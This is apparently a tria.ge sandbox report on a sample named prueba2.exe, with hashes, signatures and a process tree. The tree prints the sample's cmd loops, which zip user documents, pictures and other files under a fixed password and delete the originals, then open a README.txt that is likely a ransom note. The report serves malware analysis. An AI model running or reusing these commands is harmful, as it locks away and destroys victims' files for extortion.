Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
107s -
max time network
74s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
28/04/2020, 01:36
Static task
static1
Behavioral task
behavioral1
Sample
prueba2.exe
Resource
win7v200410
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
prueba2.exe
Resource
win10v200410
0 signatures
0 seconds
General
-
Target
prueba2.exe
-
Size
329KB
-
MD5
9f5f9c71bb71b8e1571fc4d27721a99e
-
SHA1
e64de07b46d896d25dc059dd774a140f109364c3
-
SHA256
be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
-
SHA512
6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2040 wrote to memory of 1116 2040 prueba2.exe 26 PID 2040 wrote to memory of 1116 2040 prueba2.exe 26 PID 2040 wrote to memory of 1116 2040 prueba2.exe 26 PID 2040 wrote to memory of 1004 2040 prueba2.exe 40 PID 2040 wrote to memory of 1004 2040 prueba2.exe 40 PID 2040 wrote to memory of 1004 2040 prueba2.exe 40 PID 2040 wrote to memory of 1704 2040 prueba2.exe 45 PID 2040 wrote to memory of 1704 2040 prueba2.exe 45 PID 2040 wrote to memory of 1704 2040 prueba2.exe 45 PID 2040 wrote to memory of 868 2040 prueba2.exe 49 PID 2040 wrote to memory of 868 2040 prueba2.exe 49 PID 2040 wrote to memory of 868 2040 prueba2.exe 49 PID 2040 wrote to memory of 456 2040 prueba2.exe 50 PID 2040 wrote to memory of 456 2040 prueba2.exe 50 PID 2040 wrote to memory of 456 2040 prueba2.exe 50 PID 2040 wrote to memory of 1800 2040 prueba2.exe 51 PID 2040 wrote to memory of 1800 2040 prueba2.exe 51 PID 2040 wrote to memory of 1800 2040 prueba2.exe 51 PID 2040 wrote to memory of 1768 2040 prueba2.exe 53 PID 2040 wrote to memory of 1768 2040 prueba2.exe 53 PID 2040 wrote to memory of 1768 2040 prueba2.exe 53 -
Suspicious use of AdjustPrivilegeToken 84 IoCs
description pid Process Token: SeRestorePrivilege 316 7z.exe Token: 35 316 7z.exe Token: SeSecurityPrivilege 316 7z.exe Token: SeSecurityPrivilege 316 7z.exe Token: SeRestorePrivilege 1128 7z.exe Token: 35 1128 7z.exe Token: SeSecurityPrivilege 1128 7z.exe Token: SeSecurityPrivilege 1128 7z.exe Token: SeRestorePrivilege 1316 7z.exe Token: 35 1316 7z.exe Token: SeSecurityPrivilege 1316 7z.exe Token: SeSecurityPrivilege 1316 7z.exe Token: SeRestorePrivilege 624 7z.exe Token: 35 624 7z.exe Token: SeSecurityPrivilege 624 7z.exe Token: SeSecurityPrivilege 624 7z.exe Token: SeRestorePrivilege 1336 7z.exe Token: 35 1336 7z.exe Token: SeSecurityPrivilege 1336 7z.exe Token: SeSecurityPrivilege 1336 7z.exe Token: SeRestorePrivilege 1436 7z.exe Token: 35 1436 7z.exe Token: SeSecurityPrivilege 1436 7z.exe Token: SeSecurityPrivilege 1436 7z.exe Token: SeRestorePrivilege 1476 7z.exe Token: 35 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeRestorePrivilege 1520 7z.exe Token: 35 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeRestorePrivilege 1612 7z.exe Token: 35 1612 7z.exe Token: SeSecurityPrivilege 1612 7z.exe Token: SeSecurityPrivilege 1612 7z.exe Token: SeRestorePrivilege 1624 7z.exe Token: 35 1624 7z.exe Token: SeSecurityPrivilege 1624 7z.exe Token: SeSecurityPrivilege 1624 7z.exe Token: SeRestorePrivilege 1656 7z.exe Token: 35 1656 7z.exe Token: SeSecurityPrivilege 1656 7z.exe Token: SeSecurityPrivilege 1656 7z.exe Token: SeRestorePrivilege 1668 7z.exe Token: 35 1668 7z.exe Token: SeSecurityPrivilege 1668 7z.exe Token: SeSecurityPrivilege 1668 7z.exe Token: SeRestorePrivilege 1664 7z.exe Token: 35 1664 7z.exe Token: SeSecurityPrivilege 1664 7z.exe Token: SeSecurityPrivilege 1664 7z.exe Token: SeRestorePrivilege 1688 7z.exe Token: 35 1688 7z.exe Token: SeSecurityPrivilege 1688 7z.exe Token: SeSecurityPrivilege 1688 7z.exe Token: SeRestorePrivilege 792 7z.exe Token: 35 792 7z.exe Token: SeSecurityPrivilege 792 7z.exe Token: SeSecurityPrivilege 792 7z.exe Token: SeRestorePrivilege 328 7z.exe Token: 35 328 7z.exe Token: SeSecurityPrivilege 328 7z.exe Token: SeSecurityPrivilege 328 7z.exe Token: SeRestorePrivilege 1692 7z.exe Token: 35 1692 7z.exe Token: SeSecurityPrivilege 1692 7z.exe Token: SeSecurityPrivilege 1692 7z.exe Token: SeRestorePrivilege 1696 7z.exe Token: 35 1696 7z.exe Token: SeSecurityPrivilege 1696 7z.exe Token: SeSecurityPrivilege 1696 7z.exe Token: SeRestorePrivilege 1708 7z.exe Token: 35 1708 7z.exe Token: SeSecurityPrivilege 1708 7z.exe Token: SeSecurityPrivilege 1708 7z.exe Token: SeRestorePrivilege 1720 7z.exe Token: 35 1720 7z.exe Token: SeSecurityPrivilege 1720 7z.exe Token: SeSecurityPrivilege 1720 7z.exe Token: SeRestorePrivilege 1808 7z.exe Token: 35 1808 7z.exe Token: SeSecurityPrivilege 1808 7z.exe Token: SeSecurityPrivilege 1808 7z.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1736 NOTEPAD.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\prueba2.exe"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:1116
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:1004
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"3⤵PID:1692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:1704
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"3⤵PID:1696
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"3⤵PID:1708
-
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"3⤵PID:1720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵PID:1800
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"3⤵PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start README.txt2⤵PID:1768
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt3⤵
- Opens file in notepad (likely ransom note)
PID:1736
-
-